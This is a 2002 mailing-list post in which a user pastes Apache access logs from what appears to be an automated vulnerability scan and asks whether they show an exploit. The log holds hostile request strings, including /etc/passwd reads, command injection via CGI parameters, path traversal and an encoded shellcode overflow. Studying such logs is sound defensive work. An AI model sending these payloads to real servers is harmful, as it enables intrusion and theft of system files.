Re: [suse-security] Possible Apache Exploit?

Hi, read this: http://lists.suse.com/archive/suse-security/2001-Nov/0314.html Regards Ruediger Charles Funderburk wrote:

Hello all,

I am new to the list and have gained a ton from reading all the comments and suggestions. I thought someone might be able to help me out and give me their two cents on something I noticed in my Apache access logs.Looks like a buffer overflow intended for a NT machine.

0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_ /c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NA I+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304

I haven't seen any of the code for the latest apache chunk exploit. Anyone have any ideas or suggestions?

Thanks!

-Charles